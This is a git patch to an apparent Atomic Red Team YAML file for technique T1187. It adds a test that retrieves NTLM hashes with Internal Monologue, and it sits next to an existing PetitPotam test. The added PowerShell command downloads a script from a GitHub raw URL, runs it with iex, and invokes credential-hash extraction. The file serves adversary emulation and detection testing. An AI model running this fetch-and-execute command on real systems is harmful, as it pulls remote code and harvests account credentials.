From 2fd693ca91ce3d9127f1558355efb7d37cc9e82d Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 17:46:53 -0500
Subject: [PATCH] Update T1187.yaml (#1960)

Added PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
---
 atomics/T1187/T1187.yaml | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/atomics/T1187/T1187.yaml b/atomics/T1187/T1187.yaml
index 2760f3ee..41eb71ba 100644
--- a/atomics/T1187/T1187.yaml
+++ b/atomics/T1187/T1187.yaml
@@ -39,3 +39,12 @@ atomic_tests:
     command: |
       & "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
       Write-Host "End of PetitPotam attack"
+- name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+  description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+      Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+    name: powershell